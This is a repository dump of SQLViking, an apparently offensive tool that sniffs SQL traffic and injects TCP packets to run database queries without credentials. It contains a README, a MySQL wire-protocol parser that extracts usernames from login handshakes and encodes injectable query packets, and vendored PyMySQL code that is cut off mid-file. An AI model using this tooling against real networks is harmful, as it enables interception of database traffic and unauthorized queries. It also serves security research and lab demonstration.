├── .gitignore ├── README.md ├── databases ├── .DS_Store ├── basedb.py ├── constantvalues.py ├── mysql.py ├── pymysql │ ├── __init__.py │ ├── _compat.py │ ├── _socketio.py │ ├── charset.py │ ├── connections.py │ ├── constants │ │ ├── CLIENT.py │ │ ├── COMMAND.py │ │ ├── ER.py │ │ ├── FIELD_TYPE.py │ │ ├── FLAG.py │ │ ├── SERVER_STATUS.py │ │ └── __init__.py │ ├── converters.py │ ├── cursors.py │ ├── err.py │ ├── times.py │ └── util.py ├── pytds │ ├── collate.cover │ ├── collate.py │ ├── tds.cover │ ├── tds.py │ ├── tz.cover │ └── tz.py └── sqlserver.py ├── demo ├── Vagrantfile ├── db │ └── create.sql ├── sinatra-app │ ├── .rvmrc │ ├── Gemfile │ ├── Gemfile.lock │ ├── Rakefile │ ├── app.rb │ ├── config.ru │ ├── database_mysql.yml │ ├── db │ │ ├── migrate │ │ │ └── 20140913010102_create_comments.rb │ │ ├── schema.rb │ │ └── seeds.rb │ └── views │ │ └── index.erb └── vagrant-scripts │ ├── config │ └── my.cnf │ ├── configure-sql-port.ps1 │ ├── enable-rdp.ps1 │ ├── install-dot-net.ps1 │ ├── install-sql-server.cmd │ ├── prepare-weakapp.sh │ ├── setup-mysql.sh │ ├── setup-sqlviking.sh │ └── setup-weakapp.sh ├── sqlviking.conf └── sqlviking.py /.gitignore: -------------------------------------------------------------------------------- 1 | databases/*.pyc 2 | databases/pymysql/*.pyc 3 | databases/pymysql/constants/*.pyc 4 | databases/pytds/*.pyc 5 | *.txt 6 | .vagrant 7 | NDP451-KB2858728-x86-x64-AllOS-ENU.exe 8 | SQLEXPRWT_x64_ENU.exe 9 | 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | SQLViking 2 | ========= 3 | 4 | ```sudo python sqlviking.py -c ``` 5 | 6 | Tool is broken up into two pieces: 7 | 1. Scout: passively reads and logs SQL queries and their responses on the wire 8 | 2. Pillage: leverages TCP injection to execute arbitrary queries and parse responses without needing credentials 9 | 10 | TDS (tabular data stream) parsing functionality forked from pytds: https://github.com/denisenkom/pytds 11 | 12 | MySQL parsing functionality forked from PyMySQL: https://github.com/PyMySQL 13 | 14 | Currently only functional on Linux due to some hackery using sigs to make raw_input() non-blocking 15 | 16 | Requires: scapy, Python 2.7.x 17 | 18 | ##Deploying the DEMO MySQL Environment 19 | (assumes vagrant is installed on your machine) 20 | ```bash 21 | vagrant box add phusion/ubuntu-14.04-amd64 22 | cd $SQLVIKING_HOME 23 | vagrant up sqlviking mysql weakapp 24 | ``` 25 | #####NOTE: We're having some trouble getting the background process to function properly on the web app, so if you run it in the order above the weakapp will run last. The server will be running correctly upon deployment: 26 | 27 | Once these three VMs are running, the weak application should be available for submitting requests. Check this in your browser by navigating to `localhost:4567`. 28 | 29 | (open a new terminal window) 30 | ```bash 31 | vagrant ssh sqlviking 32 | ``` 33 | 34 | Inside of the sqlviking VM 35 | ```bash 36 | vagrant@ubuntu-14:/opt/sqlviking$ cd /opt/sqlviking 37 | vagrant@ubuntu-14:/opt/sqlviking$ sudo python sqlviking.py 38 | ``` 39 | 40 | ##Common Issues 41 | ###Is it working yet? 42 | Actually, yes! 43 | ###SQLViking isn't picking anything up :( 44 | Make sure you ran sqlviking with `sudo` or it won't work properly because scapy doesn't have the appropriate access to the network interface. Virtual interfaces run by virtualbox also don't seem to play nice with any kind of pcap tools including wireshark. Trying setting up a test box with VMWare instead. 45 | ###I can't inject in the vagrant environment 46 | We know. Scapy (the library we use for picking/putting packets on the wire) doesn't play nice with virtual interfaces. Working to resolve now. 47 | -------------------------------------------------------------------------------- /databases/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Atticuss/SQLViking/18f31b004de44d820b82ea05ec79a6eb7dc61dae/databases/.DS_Store -------------------------------------------------------------------------------- /databases/basedb.py: -------------------------------------------------------------------------------- 1 | import abc 2 | 3 | class BaseDB(): 4 | __metaclass__ = abc.ABCMeta 5 | 6 | @abc.abstractmethod 7 | def encodeQuery(self,query): 8 | return 9 | 10 | @abc.abstractmethod 11 | def isDB(self, payload): 12 | return 13 | 14 | @abc.abstractmethod 15 | def isReq(self, payloads): 16 | return 17 | 18 | @abc.abstractmethod 19 | def isResp(self, payloads): 20 | return 21 | 22 | @abc.abstractmethod 23 | def parseReq(self, data, conn): 24 | return 25 | 26 | @abc.abstractmethod 27 | def parseResp(self, data, conn): 28 | return -------------------------------------------------------------------------------- /databases/constantvalues.py: -------------------------------------------------------------------------------- 1 | #when adding additional DBs, assign their value to the next unused prime number 2 | UNKNOWN = 1 3 | REQUEST = 2 4 | RESPONSE = 3 5 | MYSQL = 5 6 | SQLSERV = 7 7 | MYSQLREQ = MYSQL * REQUEST 8 | MYSQLRESP = MYSQL * RESPONSE 9 | SQLSERVREQ = SQLSERV * REQUEST 10 | SQLSERVRESP = SQLSERV * RESPONSE 11 | 12 | ISREQ = lambda x: x % REQUEST == 0 13 | ISRESP = lambda x: x % RESPONSE == 0 14 | ISMYSQL = lambda x: x % MYSQL == 0 15 | ISSQLSERV = lambda x: x % SQLSERV == 0 16 | 17 | HANDSHAKE = 1 18 | ESTABLISHED = 2 19 | 20 | HUMAN = 1 21 | CSV = 2 22 | JSON = 3 -------------------------------------------------------------------------------- /databases/mysql.py: -------------------------------------------------------------------------------- 1 | import abc,sys 2 | from basedb import BaseDB 3 | from sys import path 4 | from constantvalues import * 5 | path.append("databases/pymysql/") 6 | import connections 7 | 8 | COM_INIT_DB = '02' 9 | 10 | class MySqlDB(BaseDB): 11 | def __init__(self): 12 | pass 13 | 14 | def encodeQuery(self,query): 15 | length = hex(len(query)+1)[2:] 16 | if len(length)%2 == 1: 17 | length = '0'+length 18 | length = self.flipEndian(length)+'0'*(6-len(length)) 19 | return (length+'0003').decode('hex')+query 20 | 21 | def getPayloads(self,data): 22 | encpkt = str(data).encode('hex') 23 | pktlen = len(encpkt)/2 24 | payloads = [] 25 | 26 | while len(encpkt)>0: 27 | length = int(self.flipEndian(encpkt[:6]),16) 28 | payloads.append(encpkt[8:8+(length*2)]) 29 | encpkt = encpkt[8+(length*2):] 30 | 31 | return payloads 32 | 33 | def printLn(self,msg): 34 | with open('out.txt','a') as f: 35 | f.write(msg+'\n') 36 | 37 | def isDB(self,payload): 38 | encpkt = str(payload).encode('hex') 39 | pktlen = len(encpkt)/2 40 | lengths = [] 41 | payloads = [] 42 | 43 | while len(encpkt)>0: 44 | length = int(self.flipEndian(encpkt[:6]),16) 45 | lengths.append(length) 46 | payloads.append(encpkt[8:8+(length*2)]) 47 | encpkt = encpkt[8+(length*2):] 48 | 49 | tlen=0 50 | for l in lengths: 51 | tlen+=l 52 | tlen+= len(lengths)*4 53 | 54 | if tlen == pktlen and len(payloads) > 0: 55 | if self.isReq(payloads): 56 | pktType = MYSQLREQ 57 | elif self.isResp(payloads): 58 | pktType = MYSQLRESP 59 | else: #possibly MySQL, cannot determine if req/resp right now 60 | pktType = MYSQL 61 | else: #not a MySQL pkt 62 | pktType = UNKNOWN 63 | 64 | return pktType 65 | 66 | def isReq(self,payloads): 67 | if payloads[0] == '0e': #COM_PING 68 | return True 69 | 70 | def isResp(self,payloads): 71 | if payloads[0] == '00000002000000': #OK RESP 72 | return True 73 | elif payloads[0][:2] == 'ff': #ERR RESP 74 | return True 75 | elif len(payloads[0]) == 2 and int(payloads[0], 16) == self.getMysqlCols(payloads): #Query RESP 76 | return True 77 | 78 | #if database can be determined, create db if it doesn't exist or point to existing db 79 | #if user can be determined, update db.users 80 | 81 | def parseReq(self,data,conn): 82 | ret = [] 83 | payloads = self.getPayloads(data) 84 | 85 | if conn.state == HANDSHAKE: #parse login pkt 86 | p = payloads[0][64:] #assumes HandshakeResponse41, no check for HandshakeResponse320. should be fine, 4.1 was released 2004. doubt any dbs are on a decade old version. 87 | username = '' 88 | for c in p: 89 | if p[:2] != '00': 90 | username += p[:2].decode('hex') 91 | else: 92 | break 93 | p = p[2:] 94 | conn.foundUser(username) 95 | conn.state = ESTABLISHED 96 | 97 | if payloads[0][:2] == COM_INIT_DB: #assumes schema is correct. no check for successful response from server 98 | conn.setInstance(payloads[0][2:].decode('hex')) 99 | ret.append('Switched to instance:\t%s'%payloads[0][2:].decode('hex')) 100 | else: 101 | data = data.encode('hex') 102 | pktlen = len(data)/2 103 | lengths = [] 104 | 105 | while len(data)>0: 106 | length = int(self.flipEndian(data[:6]),16) 107 | lengths.append(length) 108 | ret.append(self.readable(data[8:8+(length*2)])) 109 | data = data[8+(length*2):] 110 | return ret 111 | 112 | def parseResp(self,data,conn): 113 | encdata = data.encode('hex') 114 | pktlen = len(encdata)/2 115 | lengths = [] 116 | ret = [] 117 | 118 | while len(encdata)>0: 119 | length = int(self.flipEndian(encdata[:6]),16) 120 | lengths.append(length) 121 | encdata = encdata[8+(length*2):] 122 | 123 | payloads = self.getPayloads(data) 124 | if payloads[0] == '00000002000000': #OK resp 125 | ret.append('Server OK response') 126 | else: 127 | res = connections.MySQLResult(connections.Result(data)) 128 | try: 129 | res.read() 130 | if res.message and len(res.message) > 0: 131 | for m in res.message: 132 | ret.append(m) 133 | if res.description and len(res.description) > 0: 134 | ret.append(str(res.description)) 135 | if res.rows and len(res.rows)>0: 136 | for r in res.rows: 137 | ret.append(str(r)) 138 | except: 139 | ret.append(sys.exc_info()[1]) 140 | return ret 141 | 142 | def getMysqlCols(self,payloads): 143 | c = -1 #ignore first payload 144 | for p in payloads: 145 | if p == "fe00002200": 146 | return c 147 | else: 148 | c+=1 149 | 150 | def flipEndian(self,data): 151 | resp='' 152 | for i in range(0,len(data),2): 153 | resp = data[i]+data[i+1]+resp 154 | return resp 155 | 156 | def validAscii(self,h): 157 | if int(h,16)>31 and int(h,16)<127: 158 | return True 159 | return False 160 | 161 | def readable(self,data): 162 | a="" 163 | for i in range(0,len(data),2): 164 | if self.validAscii(data[i:i+2]): 165 | a+=data[i:i+2].decode('hex') 166 | return a -------------------------------------------------------------------------------- /databases/pymysql/__init__.py: -------------------------------------------------------------------------------- 1 | ''' 2 | PyMySQL: A pure-Python MySQL client library. 3 | 4 | Copyright (c) 2010, 2013 PyMySQL contributors 5 | 6 | Permission is hereby granted, free of charge, to any person obtaining a copy 7 | of this software and associated documentation files (the "Software"), to deal 8 | in the Software without restriction, including without limitation the rights 9 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 10 | copies of the Software, and to permit persons to whom the Software is 11 | furnished to do so, subject to the following conditions: 12 | 13 | The above copyright notice and this permission notice shall be included in 14 | all copies or substantial portions of the Software. 15 | 16 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 17 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 18 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 19 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 20 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 21 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN 22 | THE SOFTWARE. 23 | 24 | ''' 25 | 26 | VERSION = (0, 6, 2, None) 27 | 28 | from ._compat import text_type, JYTHON, IRONPYTHON 29 | from .constants import FIELD_TYPE 30 | from .converters import escape_dict, escape_sequence, escape_string 31 | from .err import Warning, Error, InterfaceError, DataError, \ 32 | DatabaseError, OperationalError, IntegrityError, InternalError, \ 33 | NotSupportedError, ProgrammingError, MySQLError 34 | from .times import Date, Time, Timestamp, \ 35 | DateFromTicks, TimeFromTicks, TimestampFromTicks 36 | 37 | import sys 38 | 39 | 40 | threadsafety = 1 41 | apilevel = "2.0" 42 | paramstyle = "format" 43 | 44 | class DBAPISet(frozenset): 45 | 46 | 47 | def __ne__(self, other): 48 | if isinstance(other, set): 49 | return super(DBAPISet, self).__ne__(self, other) 50 | else: 51 | return other not in self 52 | 53 | def __eq__(self, other): 54 | if isinstance(other, frozenset): 55 | return frozenset.__eq__(self, other) 56 | else: 57 | return other in self 58 | 59 | def __hash__(self): 60 | return frozenset.__hash__(self) 61 | 62 | 63 | STRING = DBAPISet([FIELD_TYPE.ENUM, FIELD_TYPE.STRING, 64 | FIELD_TYPE.VAR_STRING]) 65 | BINARY = DBAPISet([FIELD_TYPE.BLOB, FIELD_TYPE.LONG_BLOB, 66 | FIELD_TYPE.MEDIUM_BLOB, FIELD_TYPE.TINY_BLOB]) 67 | NUMBER = DBAPISet([FIELD_TYPE.DECIMAL, FIELD_TYPE.DOUBLE, FIELD_TYPE.FLOAT, 68 | FIELD_TYPE.INT24, FIELD_TYPE.LONG, FIELD_TYPE.LONGLONG, 69 | FIELD_TYPE.TINY, FIELD_TYPE.YEAR]) 70 | DATE = DBAPISet([FIELD_TYPE.DATE, FIELD_TYPE.NEWDATE]) 71 | TIME = DBAPISet([FIELD_TYPE.TIME]) 72 | TIMESTAMP = DBAPISet([FIELD_TYPE.TIMESTAMP, FIELD_TYPE.DATETIME]) 73 | DATETIME = TIMESTAMP 74 | ROWID = DBAPISet() 75 | 76 | def Binary(x): 77 | """Return x as a binary type.""" 78 | if isinstance(x, text_type) and not (JYTHON or IRONPYTHON): 79 | return x.encode() 80 | return bytes(x) 81 | 82 | def Connect(*args, **kwargs): 83 | """ 84 | Connect to the database; see connections.Connection.__init__() for 85 | more information. 86 | """ 87 | from .connections import Connection 88 | return Connection(*args, **kwargs) 89 | 90 | from pymysql import connections as _orig_conn 91 | if _orig_conn.Connection.__init__.__doc__ is not None: 92 | Connect.__doc__ = _orig_conn.Connection.__init__.__doc__ + (""" 93 | See connections.Connection.__init__() for information about defaults. 94 | """) 95 | del _orig_conn 96 | 97 | def get_client_info(): # for MySQLdb compatibility 98 | return '.'.join(map(str, VERSION)) 99 | 100 | connect = Connection = Connect 101 | 102 | # we include a doctored version_info here for MySQLdb compatibility 103 | version_info = (1,2,2,"final",0) 104 | 105 | NULL = "NULL" 106 | 107 | __version__ = get_client_info() 108 | 109 | def thread_safe(): 110 | return True # match MySQLdb.thread_safe() 111 | 112 | def install_as_MySQLdb(): 113 | """ 114 | After this function is called, any application that imports MySQLdb or 115 | _mysql will unwittingly actually use 116 | """ 117 | sys.modules["MySQLdb"] = sys.modules["_mysql"] = sys.modules["pymysql"] 118 | 119 | __all__ = [ 120 | 'BINARY', 'Binary', 'Connect', 'Connection', 'DATE', 'Date', 121 | 'Time', 'Timestamp', 'DateFromTicks', 'TimeFromTicks', 'TimestampFromTicks', 122 | 'DataError', 'DatabaseError', 'Error', 'FIELD_TYPE', 'IntegrityError', 123 | 'InterfaceError', 'InternalError', 'MySQLError', 'NULL', 'NUMBER', 124 | 'NotSupportedError', 'DBAPISet', 'OperationalError', 'ProgrammingError', 125 | 'ROWID', 'STRING', 'TIME', 'TIMESTAMP', 'Warning', 'apilevel', 'connect', 126 | 'connections', 'constants', 'converters', 'cursors', 127 | 'escape_dict', 'escape_sequence', 'escape_string', 'get_client_info', 128 | 'paramstyle', 'threadsafety', 'version_info', 129 | 130 | "install_as_MySQLdb", 131 | 132 | "NULL","__version__", 133 | ] 134 | -------------------------------------------------------------------------------- /databases/pymysql/_compat.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | PY2 = sys.version_info[0] == 2 4 | PYPY = hasattr(sys, 'pypy_translation_info') 5 | JYTHON = sys.platform.startswith('java') 6 | IRONPYTHON = sys.platform == 'cli' 7 | 8 | if PY2: 9 | range_type = xrange 10 | text_type = unicode 11 | long_type = long 12 | str_type = basestring 13 | else: 14 | range_type = range 15 | text_type = str 16 | long_type = int 17 | str_type = str 18 | -------------------------------------------------------------------------------- /databases/pymysql/_socketio.py: -------------------------------------------------------------------------------- 1 | """ 2 | SocketIO imported from socket module in Python 3. 3 | 4 | Copyright (c) 2001-2013 Python Software Foundation; All Rights Reserved. 5 | """ 6 | 7 | from socket import * 8 | import io 9 | import errno 10 | 11 | __all__ = ['SocketIO'] 12 | 13 | EINTR = errno.EINTR 14 | _blocking_errnos = (errno.EAGAIN, errno.EWOULDBLOCK) 15 | 16 | class SocketIO(io.RawIOBase): 17 | 18 | """Raw I/O implementation for stream sockets. 19 | 20 | This class supports the makefile() method on sockets. It provides 21 | the raw I/O interface on top of a socket object. 22 | """ 23 | 24 | # One might wonder why not let FileIO do the job instead. There are two 25 | # main reasons why FileIO is not adapted: 26 | # - it wouldn't work under Windows (where you can't used read() and 27 | # write() on a socket handle) 28 | # - it wouldn't work with socket timeouts (FileIO would ignore the 29 | # timeout and consider the socket non-blocking) 30 | 31 | # XXX More docs 32 | 33 | def __init__(self, sock, mode): 34 | if mode not in ("r", "w", "rw", "rb", "wb", "rwb"): 35 | raise ValueError("invalid mode: %r" % mode) 36 | io.RawIOBase.__init__(self) 37 | self._sock = sock 38 | if "b" not in mode: 39 | mode += "b" 40 | self._mode = mode 41 | self._reading = "r" in mode 42 | self._writing = "w" in mode 43 | self._timeout_occurred = False 44 | 45 | def readinto(self, b): 46 | """Read up to len(b) bytes into the writable buffer *b* and return 47 | the number of bytes read. If the socket is non-blocking and no bytes 48 | are available, None is returned. 49 | 50 | If *b* is non-empty, a 0 return value indicates that the connection 51 | was shutdown at the other end. 52 | """ 53 | self._checkClosed() 54 | self._checkReadable() 55 | if self._timeout_occurred: 56 | raise IOError("cannot read from timed out object") 57 | while True: 58 | try: 59 | return self._sock.recv_into(b) 60 | except timeout: 61 | self._timeout_occurred = True 62 | raise 63 | except error as e: 64 | n = e.args[0] 65 | if n == EINTR: 66 | continue 67 | if n in _blocking_errnos: 68 | return None 69 | raise 70 | 71 | def write(self, b): 72 | """Write the given bytes or bytearray object *b* to the socket 73 | and return the number of bytes written. This can be less than 74 | len(b) if not all data could be written. If the socket is 75 | non-blocking and no bytes could be written None is returned. 76 | """ 77 | self._checkClosed() 78 | self._checkWritable() 79 | try: 80 | return self._sock.send(b) 81 | except error as e: 82 | # XXX what about EINTR? 83 | if e.args[0] in _blocking_errnos: 84 | return None 85 | raise 86 | 87 | def readable(self): 88 | """True if the SocketIO is open for reading. 89 | """ 90 | if self.closed: 91 | raise ValueError("I/O operation on closed socket.") 92 | return self._reading 93 | 94 | def writable(self): 95 | """True if the SocketIO is open for writing. 96 | """ 97 | if self.closed: 98 | raise ValueError("I/O operation on closed socket.") 99 | return self._writing 100 | 101 | def seekable(self): 102 | """True if the SocketIO is open for seeking. 103 | """ 104 | if self.closed: 105 | raise ValueError("I/O operation on closed socket.") 106 | return super().seekable() 107 | 108 | def fileno(self): 109 | """Return the file descriptor of the underlying socket. 110 | """ 111 | self._checkClosed() 112 | return self._sock.fileno() 113 | 114 | @property 115 | def name(self): 116 | if not self.closed: 117 | return self.fileno() 118 | else: 119 | return -1 120 | 121 | @property 122 | def mode(self): 123 | return self._mode 124 | 125 | def close(self): 126 | """Close the SocketIO object. This doesn't close the underlying 127 | socket, except if all references to it have disappeared. 128 | """ 129 | if self.closed: 130 | return 131 | io.RawIOBase.close(self) 132 | self._sock._decref_socketios() 133 | self._sock = None 134 | 135 | -------------------------------------------------------------------------------- /databases/pymysql/charset.py: -------------------------------------------------------------------------------- 1 | MBLENGTH = { 2 | 8:1, 3 | 33:3, 4 | 88:2, 5 | 91:2 6 | } 7 | 8 | 9 | class Charset(object): 10 | def __init__(self, id, name, collation, is_default): 11 | self.id, self.name, self.collation = id, name, collation 12 | self.is_default = is_default == 'Yes' 13 | 14 | @property 15 | def encoding(self): 16 | name = self.name 17 | if name == 'utf8mb4': 18 | return 'utf8' 19 | return name 20 | 21 | @property 22 | def is_binary(self): 23 | return self.id == 63 24 | 25 | 26 | class Charsets: 27 | def __init__(self): 28 | self._by_id = {} 29 | 30 | def add(self, c): 31 | self._by_id[c.id] = c 32 | 33 | def by_id(self, id): 34 | return self._by_id[id] 35 | 36 | def by_name(self, name): 37 | name = name.lower() 38 | for c in self._by_id.values(): 39 | if c.name == name and c.is_default: 40 | return c 41 | 42 | _charsets = Charsets() 43 | """ 44 | Generated with: 45 | 46 | mysql -N -s -e "select id, character_set_name, collation_name, is_default 47 | from information_schema.collations order by id;" | python -c "import sys 48 | for l in sys.stdin.readlines(): 49 | id, name, collation, is_default = l.split(chr(9)) 50 | print '_charsets.add(Charset(%s, \'%s\', \'%s\', \'%s\'))' \ 51 | % (id, name, collation, is_default.strip()) 52 | " 53 | 54 | """ 55 | _charsets.add(Charset(1, 'big5', 'big5_chinese_ci', 'Yes')) 56 | _charsets.add(Charset(2, 'latin2', 'latin2_czech_cs', '')) 57 | _charsets.add(Charset(3, 'dec8', 'dec8_swedish_ci', 'Yes')) 58 | _charsets.add(Charset(4, 'cp850', 'cp850_general_ci', 'Yes')) 59 | _charsets.add(Charset(5, 'latin1', 'latin1_german1_ci', '')) 60 | _charsets.add(Charset(6, 'hp8', 'hp8_english_ci', 'Yes')) 61 | _charsets.add(Charset(7, 'koi8r', 'koi8r_general_ci', 'Yes')) 62 | _charsets.add(Charset(8, 'latin1', 'latin1_swedish_ci', 'Yes')) 63 | _charsets.add(Charset(9, 'latin2', 'latin2_general_ci', 'Yes')) 64 | _charsets.add(Charset(10, 'swe7', 'swe7_swedish_ci', 'Yes')) 65 | _charsets.add(Charset(11, 'ascii', 'ascii_general_ci', 'Yes')) 66 | _charsets.add(Charset(12, 'ujis', 'ujis_japanese_ci', 'Yes')) 67 | _charsets.add(Charset(13, 'sjis', 'sjis_japanese_ci', 'Yes')) 68 | _charsets.add(Charset(14, 'cp1251', 'cp1251_bulgarian_ci', '')) 69 | _charsets.add(Charset(15, 'latin1', 'latin1_danish_ci', '')) 70 | _charsets.add(Charset(16, 'hebrew', 'hebrew_general_ci', 'Yes')) 71 | _charsets.add(Charset(18, 'tis620', 'tis620_thai_ci', 'Yes')) 72 | _charsets.add(Charset(19, 'euckr', 'euckr_korean_ci', 'Yes')) 73 | _charsets.add(Charset(20, 'latin7', 'latin7_estonian_cs', '')) 74 | _charsets.add(Charset(21, 'latin2', 'latin2_hungarian_ci', '')) 75 | _charsets.add(Charset(22, 'koi8u', 'koi8u_general_ci', 'Yes')) 76 | _charsets.add(Charset(23, 'cp1251', 'cp1251_ukrainian_ci', '')) 77 | _charsets.add(Charset(24, 'gb2312', 'gb2312_chinese_ci', 'Yes')) 78 | _charsets.add(Charset(25, 'greek', 'greek_general_ci', 'Yes')) 79 | _charsets.add(Charset(26, 'cp1250', 'cp1250_general_ci', 'Yes')) 80 | _charsets.add(Charset(27, 'latin2', 'latin2_croatian_ci', '')) 81 | _charsets.add(Charset(28, 'gbk', 'gbk_chinese_ci', 'Yes')) 82 | _charsets.add(Charset(29, 'cp1257', 'cp1257_lithuanian_ci', '')) 83 | _charsets.add(Charset(30, 'latin5', 'latin5_turkish_ci', 'Yes')) 84 | _charsets.add(Charset(31, 'latin1', 'latin1_german2_ci', '')) 85 | _charsets.add(Charset(32, 'armscii8', 'armscii8_general_ci', 'Yes')) 86 | _charsets.add(Charset(33, 'utf8', 'utf8_general_ci', 'Yes')) 87 | _charsets.add(Charset(34, 'cp1250', 'cp1250_czech_cs', '')) 88 | _charsets.add(Charset(35, 'ucs2', 'ucs2_general_ci', 'Yes')) 89 | _charsets.add(Charset(36, 'cp866', 'cp866_general_ci', 'Yes')) 90 | _charsets.add(Charset(37, 'keybcs2', 'keybcs2_general_ci', 'Yes')) 91 | _charsets.add(Charset(38, 'macce', 'macce_general_ci', 'Yes')) 92 | _charsets.add(Charset(39, 'macroman', 'macroman_general_ci', 'Yes')) 93 | _charsets.add(Charset(40, 'cp852', 'cp852_general_ci', 'Yes')) 94 | _charsets.add(Charset(41, 'latin7', 'latin7_general_ci', 'Yes')) 95 | _charsets.add(Charset(42, 'latin7', 'latin7_general_cs', '')) 96 | _charsets.add(Charset(43, 'macce', 'macce_bin', '')) 97 | _charsets.add(Charset(44, 'cp1250', 'cp1250_croatian_ci', '')) 98 | _charsets.add(Charset(45, 'utf8mb4', 'utf8mb4_general_ci', 'Yes')) 99 | _charsets.add(Charset(46, 'utf8mb4', 'utf8mb4_bin', '')) 100 | _charsets.add(Charset(47, 'latin1', 'latin1_bin', '')) 101 | _charsets.add(Charset(48, 'latin1', 'latin1_general_ci', '')) 102 | _charsets.add(Charset(49, 'latin1', 'latin1_general_cs', '')) 103 | _charsets.add(Charset(50, 'cp1251', 'cp1251_bin', '')) 104 | _charsets.add(Charset(51, 'cp1251', 'cp1251_general_ci', 'Yes')) 105 | _charsets.add(Charset(52, 'cp1251', 'cp1251_general_cs', '')) 106 | _charsets.add(Charset(53, 'macroman', 'macroman_bin', '')) 107 | _charsets.add(Charset(54, 'utf16', 'utf16_general_ci', 'Yes')) 108 | _charsets.add(Charset(55, 'utf16', 'utf16_bin', '')) 109 | _charsets.add(Charset(57, 'cp1256', 'cp1256_general_ci', 'Yes')) 110 | _charsets.add(Charset(58, 'cp1257', 'cp1257_bin', '')) 111 | _charsets.add(Charset(59, 'cp1257', 'cp1257_general_ci', 'Yes')) 112 | _charsets.add(Charset(60, 'utf32', 'utf32_general_ci', 'Yes')) 113 | _charsets.add(Charset(61, 'utf32', 'utf32_bin', '')) 114 | _charsets.add(Charset(63, 'binary', 'binary', 'Yes')) 115 | _charsets.add(Charset(64, 'armscii8', 'armscii8_bin', '')) 116 | _charsets.add(Charset(65, 'ascii', 'ascii_bin', '')) 117 | _charsets.add(Charset(66, 'cp1250', 'cp1250_bin', '')) 118 | _charsets.add(Charset(67, 'cp1256', 'cp1256_bin', '')) 119 | _charsets.add(Charset(68, 'cp866', 'cp866_bin', '')) 120 | _charsets.add(Charset(69, 'dec8', 'dec8_bin', '')) 121 | _charsets.add(Charset(70, 'greek', 'greek_bin', '')) 122 | _charsets.add(Charset(71, 'hebrew', 'hebrew_bin', '')) 123 | _charsets.add(Charset(72, 'hp8', 'hp8_bin', '')) 124 | _charsets.add(Charset(73, 'keybcs2', 'keybcs2_bin', '')) 125 | _charsets.add(Charset(74, 'koi8r', 'koi8r_bin', '')) 126 | _charsets.add(Charset(75, 'koi8u', 'koi8u_bin', '')) 127 | _charsets.add(Charset(77, 'latin2', 'latin2_bin', '')) 128 | _charsets.add(Charset(78, 'latin5', 'latin5_bin', '')) 129 | _charsets.add(Charset(79, 'latin7', 'latin7_bin', '')) 130 | _charsets.add(Charset(80, 'cp850', 'cp850_bin', '')) 131 | _charsets.add(Charset(81, 'cp852', 'cp852_bin', '')) 132 | _charsets.add(Charset(82, 'swe7', 'swe7_bin', '')) 133 | _charsets.add(Charset(83, 'utf8', 'utf8_bin', '')) 134 | _charsets.add(Charset(84, 'big5', 'big5_bin', '')) 135 | _charsets.add(Charset(85, 'euckr', 'euckr_bin', '')) 136 | _charsets.add(Charset(86, 'gb2312', 'gb2312_bin', '')) 137 | _charsets.add(Charset(87, 'gbk', 'gbk_bin', '')) 138 | _charsets.add(Charset(88, 'sjis', 'sjis_bin', '')) 139 | _charsets.add(Charset(89, 'tis620', 'tis620_bin', '')) 140 | _charsets.add(Charset(90, 'ucs2', 'ucs2_bin', '')) 141 | _charsets.add(Charset(91, 'ujis', 'ujis_bin', '')) 142 | _charsets.add(Charset(92, 'geostd8', 'geostd8_general_ci', 'Yes')) 143 | _charsets.add(Charset(93, 'geostd8', 'geostd8_bin', '')) 144 | _charsets.add(Charset(94, 'latin1', 'latin1_spanish_ci', '')) 145 | _charsets.add(Charset(95, 'cp932', 'cp932_japanese_ci', 'Yes')) 146 | _charsets.add(Charset(96, 'cp932', 'cp932_bin', '')) 147 | _charsets.add(Charset(97, 'eucjpms', 'eucjpms_japanese_ci', 'Yes')) 148 | _charsets.add(Charset(98, 'eucjpms', 'eucjpms_bin', '')) 149 | _charsets.add(Charset(99, 'cp1250', 'cp1250_polish_ci', '')) 150 | _charsets.add(Charset(101, 'utf16', 'utf16_unicode_ci', '')) 151 | _charsets.add(Charset(102, 'utf16', 'utf16_icelandic_ci', '')) 152 | _charsets.add(Charset(103, 'utf16', 'utf16_latvian_ci', '')) 153 | _charsets.add(Charset(104, 'utf16', 'utf16_romanian_ci', '')) 154 | _charsets.add(Charset(105, 'utf16', 'utf16_slovenian_ci', '')) 155 | _charsets.add(Charset(106, 'utf16', 'utf16_polish_ci', '')) 156 | _charsets.add(Charset(107, 'utf16', 'utf16_estonian_ci', '')) 157 | _charsets.add(Charset(108, 'utf16', 'utf16_spanish_ci', '')) 158 | _charsets.add(Charset(109, 'utf16', 'utf16_swedish_ci', '')) 159 | _charsets.add(Charset(110, 'utf16', 'utf16_turkish_ci', '')) 160 | _charsets.add(Charset(111, 'utf16', 'utf16_czech_ci', '')) 161 | _charsets.add(Charset(112, 'utf16', 'utf16_danish_ci', '')) 162 | _charsets.add(Charset(113, 'utf16', 'utf16_lithuanian_ci', '')) 163 | _charsets.add(Charset(114, 'utf16', 'utf16_slovak_ci', '')) 164 | _charsets.add(Charset(115, 'utf16', 'utf16_spanish2_ci', '')) 165 | _charsets.add(Charset(116, 'utf16', 'utf16_roman_ci', '')) 166 | _charsets.add(Charset(117, 'utf16', 'utf16_persian_ci', '')) 167 | _charsets.add(Charset(118, 'utf16', 'utf16_esperanto_ci', '')) 168 | _charsets.add(Charset(119, 'utf16', 'utf16_hungarian_ci', '')) 169 | _charsets.add(Charset(120, 'utf16', 'utf16_sinhala_ci', '')) 170 | _charsets.add(Charset(128, 'ucs2', 'ucs2_unicode_ci', '')) 171 | _charsets.add(Charset(129, 'ucs2', 'ucs2_icelandic_ci', '')) 172 | _charsets.add(Charset(130, 'ucs2', 'ucs2_latvian_ci', '')) 173 | _charsets.add(Charset(131, 'ucs2', 